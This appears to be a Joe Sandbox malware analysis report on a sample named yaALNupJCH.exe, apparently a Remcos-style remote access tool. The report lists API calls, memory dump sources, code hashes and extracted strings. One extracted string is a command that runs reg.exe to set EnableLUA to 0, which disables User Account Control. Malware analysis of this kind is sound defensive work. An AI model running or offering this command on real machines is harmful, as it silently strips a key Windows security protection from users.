                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$CreateProcess
                                                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                • API String ID: 2922976086-4183131282
                                                                                                • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                                                                • Instruction ID: 6d22cccb136f8c7c36af3d9037574c26d6fdc27d3282f638de1bcab3d2eebeae
                                                                                                • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                                                                • Instruction Fuzzy Hash: 91F03676D402AD76CB20ABD69C0DEDF7F7CEBC5B11F00056AF904A6141D6745404C6B9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: SG$C:\Users\user\Desktop\yaALNupJCH.exe
                                                                                                • API String ID: 0-3011503130
                                                                                                • Opcode ID: 609596a1dfd73e3e14ef38a12528c0b0aa9ed42c21a05a81d57c6312ddfedd5a
                                                                                                • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                                                                                • Opcode Fuzzy Hash: 609596a1dfd73e3e14ef38a12528c0b0aa9ed42c21a05a81d57c6312ddfedd5a
                                                                                                • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044324A,?,?,004431EA,?), ref: 004432B9
                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004432CC
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0044324A,?,?,004431EA,?), ref: 004432EF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                • Opcode ID: f5213dab678aaad7ce64006389dcdf2bf679603fda04a95a9a10c3b8942720a1
                                                                                                • Instruction ID: d6523aa37e87c1c2bcc0dcc45afbce366257b9007ee31406ae6b5b7091a20f6c
                                                                                                • Opcode Fuzzy Hash: f5213dab678aaad7ce64006389dcdf2bf679603fda04a95a9a10c3b8942720a1
                                                                                                • Instruction Fuzzy Hash: FEF06830A10209FBDF119F55DC4ABAEBFB4EF04717F1040A9FC05A2261DB759E44CA98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                                                                                  • Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                • String ID: KeepAlive | Disabled
                                                                                                • API String ID: 2993684571-305739064
                                                                                                • Opcode ID: c89493562ef56592cd274de949ad9ad6ba40f59555c5c3e9409e64ec138271b3
                                                                                                • Instruction ID: be8b30cc66014f6f38b18e309eaaceb63009414c245f721ed48000bbed9aec6c
                                                                                                • Opcode Fuzzy Hash: c89493562ef56592cd274de949ad9ad6ba40f59555c5c3e9409e64ec138271b3
                                                                                                • Instruction Fuzzy Hash: 35F06D71904711BBDB103B758D0AA6B7A98AB02311F0009BEF982916E2D6798840CF9A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0001D3AB,00000000,00000000,00000000), ref: 00416B95
                                                                                                • ShowWindow.USER32(00000009), ref: 00416BAF
                                                                                                • SetForegroundWindow.USER32 ref: 00416BBB
                                                                                                  • Part of subcall function 0041CCE9: AllocConsole.KERNEL32(00475338), ref: 0041CCF2
                                                                                                  • Part of subcall function 0041CCE9: ShowWindow.USER32(00000000,00000000), ref: 0041CD0B
                                                                                                  • Part of subcall function 0041CCE9: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CD30
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                                                                • String ID: !D@$C}w
                                                                                                • API String ID: 3446828153-1857420697
                                                                                                • Opcode ID: 84ef8a25efd007cc1268911e401fe5a5d24e8a31d2882b70fc54203c176493d0
                                                                                                • Instruction ID: 6c1e835a2e3b1b3c7886c80a3b5eda03b2495c8f90604007deffab7b6682260a
                                                                                                • Opcode Fuzzy Hash: 84ef8a25efd007cc1268911e401fe5a5d24e8a31d2882b70fc54203c176493d0
                                                                                                • Instruction Fuzzy Hash: 65F0E2B0148240EED720AB22EC06EFA7758EB50301F00083BFC09C54F2DB389C85C65D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00CC4AE8,?,?,00CC4AB0,?,?,?), ref: 00CC4B08
                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CC4B1B
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00CC4AE8,?,?,00CC4AB0,?,?,?), ref: 00CC4B3E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                • Opcode ID: 035d9223254fe41ec9c440c4123476bcd5d8fac94ba2cee0cff3ecf025f29688
                                                                                                • Instruction ID: 426fd54d3ad1dbdd7f1014929ad5a0b302cd262f2bdff15235838a320106c2ec
                                                                                                • Opcode Fuzzy Hash: 035d9223254fe41ec9c440c4123476bcd5d8fac94ba2cee0cff3ecf025f29688
                                                                                                • Instruction Fuzzy Hash: 93F0A030602619FBDB25AB51DD1AFDEBB79EB00756F104066F911A21A0CF74CF00DB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AD40
                                                                                                • PlaySoundW.WINMM(00000000,00000000), ref: 0041AD4E
                                                                                                • Sleep.KERNEL32(00002710), ref: 0041AD55
                                                                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AD5E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                • String ID: Alarm triggered
                                                                                                • API String ID: 614609389-2816303416
                                                                                                • Opcode ID: 4dafe254b891ac29e7b72a4f72621bc5709ac5193998fbb15c850d7c7e1b3c37
                                                                                                • Instruction ID: 4347c1bab0e95251c889606097f69e32bbbd9763772de416a0f4cb90da384652
                                                                                                • Opcode Fuzzy Hash: 4dafe254b891ac29e7b72a4f72621bc5709ac5193998fbb15c850d7c7e1b3c37
                                                                                                • Instruction Fuzzy Hash: 13E01226A44260779610337B6D4FD6F3D28DAC2B5174500BEFA0666192D9580C458AFB
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CD3B), ref: 0041CCB0
                                                                                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CD3B), ref: 0041CCBD
                                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CD3B), ref: 0041CCCA
                                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CD3B), ref: 0041CCDD
                                                                                                Strings
                                                                                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CCD0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                • API String ID: 3024135584-2418719853
                                                                                                • Opcode ID: 8ff930b8604bb53ffe35bf108dd56401a2603a1966e7a2aa141ca9340b3fe5c1
                                                                                                • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                                                                                • Opcode Fuzzy Hash: 8ff930b8604bb53ffe35bf108dd56401a2603a1966e7a2aa141ca9340b3fe5c1
                                                                                                • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$InformationTimeZone
                                                                                                • String ID:
                                                                                                • API String ID: 597776487-0
                                                                                                • Opcode ID: 03f0e36d49ee1babd5fb7ae740cc81eefb9f4b3f3dab0002eb918a82c57252ac
                                                                                                • Instruction ID: ef3b27860517d8e5590d88881680a5552ebead9be0de397dd783ee5605814422
                                                                                                • Opcode Fuzzy Hash: 03f0e36d49ee1babd5fb7ae740cc81eefb9f4b3f3dab0002eb918a82c57252ac
                                                                                                • Instruction Fuzzy Hash: 86C11671900245AFDB219F68C881FAE7BBAEF46314F24057EE5A59B292D7308F43D750
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00CD3D45,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00CD3B2C
                                                                                                • __alloca_probe_16.LIBCMT ref: 00CD3BE2
                                                                                                • __alloca_probe_16.LIBCMT ref: 00CD3C78
                                                                                                • __freea.LIBCMT ref: 00CD3CE3
                                                                                                • __freea.LIBCMT ref: 00CD3CEF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __alloca_probe_16__freea$Info
                                                                                                • String ID:
                                                                                                • API String ID: 2330168043-0
                                                                                                • Opcode ID: cd8bf8059d3efcf53800e3e63db12f032a18f5c532246cb5da758b0f47cd14c2
                                                                                                • Instruction ID: 76de982beeed2ae9460e2ad174b3520c45739204e051398234e1a144de85d0cf
                                                                                                • Opcode Fuzzy Hash: cd8bf8059d3efcf53800e3e63db12f032a18f5c532246cb5da758b0f47cd14c2
                                                                                                • Instruction Fuzzy Hash: 85811672A10299ABDF209F54C881EEF7BB5AF49710F18015BEA14B7341D725CF40DBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 142ba21da1110888b7575ac3c17cce9c5c3346c5f5de57ddb1c4218e965c1a6b
                                                                                                • Instruction ID: 6773e46793da779a19708a3feb32e25a3a8b71c5f8d5da9fc9af74bf1ccc1eec
                                                                                                • Opcode Fuzzy Hash: 142ba21da1110888b7575ac3c17cce9c5c3346c5f5de57ddb1c4218e965c1a6b
                                                                                                • Instruction Fuzzy Hash: 0271D431900216EBEB20CF55C844AFFBB74EF85361F54422BE816972A1D7788CC1CBA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • __alloca_probe_16.LIBCMT ref: 00CD2378
                                                                                                • __alloca_probe_16.LIBCMT ref: 00CD243E
                                                                                                • __freea.LIBCMT ref: 00CD24AA
                                                                                                  • Part of subcall function 00CC8E3A: HeapAlloc.KERNEL32(00000000,?,?,?,00CCC46B,00000220,?,?,?,?,?,?,00CC596B,?), ref: 00CC8E6C
                                                                                                • __freea.LIBCMT ref: 00CD24B3
                                                                                                • __freea.LIBCMT ref: 00CD24D6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1096550386-0
                                                                                                • Opcode ID: 2fa6822132c03e2988a13a0f5c71b9c44ff095cc32d8bee9c51cbd307953e9a1
                                                                                                • Instruction ID: 8a14cee48cf2c0debc55a2d8e9f821d7c847a7b156e6bc3177486657c944f374
                                                                                                • Opcode Fuzzy Hash: 2fa6822132c03e2988a13a0f5c71b9c44ff095cc32d8bee9c51cbd307953e9a1
                                                                                                • Instruction Fuzzy Hash: 6F51E172600216ABDF219F64CC81FBF36A9DF94754F15412AFE18A7350EB38DE5096A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 0044928F
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449307
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449334
                                                                                                • _free.LIBCMT ref: 0044927D
                                                                                                  • Part of subcall function 00446642: RtlFreeHeap.NTDLL(00000000,00000000,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?), ref: 00446658
                                                                                                  • Part of subcall function 00446642: GetLastError.KERNEL32(?,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?,?), ref: 0044666A
                                                                                                • _free.LIBCMT ref: 00449449
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                • String ID:
                                                                                                • API String ID: 1286116820-0
                                                                                                • Opcode ID: e861f10619cee8555c14399ef2ad6aeaf2311a34d1c0502880df977b07f1d2e5
                                                                                                • Instruction ID: 735babbbd0be657ab0757445e5474bf64f8f3a8b7ca3a8d9b3b34063795322e9
                                                                                                • Opcode Fuzzy Hash: e861f10619cee8555c14399ef2ad6aeaf2311a34d1c0502880df977b07f1d2e5
                                                                                                • Instruction Fuzzy Hash: 86511D71800205EBEB14EFA5DD819AFB7B8EF45314F1442AFE81493291E7788D41DB5C
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00CC51F0), ref: 00CC52E0
                                                                                                • GetFileInformationByHandle.KERNEL32(?,?), ref: 00CC533A
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00CC51F0,?,000000FF,00000000,00000000), ref: 00CC53C8
                                                                                                • __dosmaperr.LIBCMT ref: 00CC53CF
                                                                                                • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00CC540C
                                                                                                  • Part of subcall function 00CC5634: __dosmaperr.LIBCMT ref: 00CC5669
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                • String ID:
                                                                                                • API String ID: 1206951868-0
                                                                                                • Opcode ID: fc287ec89f0f8c63f71a592a269031c89f0d0187524db645b284b2a56aa0defb
                                                                                                • Instruction ID: 4a6119b25b19cb0be12a717063787b324fdcc154e11b3cc3fc8fa50e17d7c47c
                                                                                                • Opcode Fuzzy Hash: fc287ec89f0f8c63f71a592a269031c89f0d0187524db645b284b2a56aa0defb
                                                                                                • Instruction Fuzzy Hash: A4414D75900B44ABCB24DFA5DC45EAFBBF9EF88340B14452EF956D3660E730A980DB21
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0041BF05: GetCurrentProcess.KERNEL32(?,?,?,0040D9F8,WinDir,00000000,00000000), ref: 0041BF16
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F869
                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040F88D
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F89C
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040FA53
                                                                                                  • Part of subcall function 0041BF33: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F547,00000000,?,?,00475338), ref: 0041BF48
                                                                                                  • Part of subcall function 0041C12B: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C143
                                                                                                  • Part of subcall function 0041C12B: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C156
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FA44
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                • String ID:
                                                                                                • API String ID: 4269425633-0
                                                                                                • Opcode ID: 7ce0eaa0b2930da6a74499d106fb459c324b9ed2a72e41934db5320175e10e7c
                                                                                                • Instruction ID: a0c68ada47c0804736a7b2772d1db97e9bc00546201e077e59639075b0857204
                                                                                                • Opcode Fuzzy Hash: 7ce0eaa0b2930da6a74499d106fb459c324b9ed2a72e41934db5320175e10e7c
                                                                                                • Instruction Fuzzy Hash: 574134311083419BC325F722DC55AEFB3A5AF94344F50493EF58A921E2EF385A4AC69A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 8692cb65d4d6bb9cba31bc66b02b2d447c0bbfc8e4e9d82d370da2cfb380f7a9
                                                                                                • Instruction ID: 180f8567f3436ff6df5672f1cc1a10b237692132214a9588386a8a5d626758db
                                                                                                • Opcode Fuzzy Hash: 8692cb65d4d6bb9cba31bc66b02b2d447c0bbfc8e4e9d82d370da2cfb380f7a9
                                                                                                • Instruction Fuzzy Hash: 1841E436A002009FDB20DF79C881A5AB7B5EF88B14F2545AEE515EB351D735AE01CB88
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DC4F,?,?,?,00000001,00000000,?,00000001,0042DC4F,0042DC4F), ref: 004510BA
                                                                                                • __alloca_probe_16.LIBCMT ref: 004510F2
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DC4F,?,?,?,00000001,00000000,?,00000001,0042DC4F,0042DC4F,?), ref: 00451143
                                                                                                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DC4F,0042DC4F,?,00000002,00000000), ref: 00451155
                                                                                                • __freea.LIBCMT ref: 0045115E
                                                                                                  • Part of subcall function 00446077: RtlAllocateHeap.NTDLL(00000000,004351DF,?,?,00438787,?,?,00000000,?,?,0040DDB0,004351DF,?,?,?,?), ref: 004460A9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                • String ID:
                                                                                                • API String ID: 313313983-0
                                                                                                • Opcode ID: 369a9eb66afadfb6e8e840eb6335fc98255c85e757915b35f66c680b2fba1eee
                                                                                                • Instruction ID: e5d6c08e9d18d7846db305dd98d41714dd399240760fd92c9c86a3e4aaa02a35
                                                                                                • Opcode Fuzzy Hash: 369a9eb66afadfb6e8e840eb6335fc98255c85e757915b35f66c680b2fba1eee
                                                                                                • Instruction Fuzzy Hash: 0F312132A0020AABDF248F65CC41EAF7BA5EF08341F05416AFD14D72A2E739CC54CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004110BE
                                                                                                • int.LIBCPMT ref: 004110D1
                                                                                                  • Part of subcall function 0040E00F: std::_Lockit::_Lockit.LIBCPMT ref: 0040E020
                                                                                                  • Part of subcall function 0040E00F: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E03A
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00411111
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0041111A
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00411138
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                • String ID:
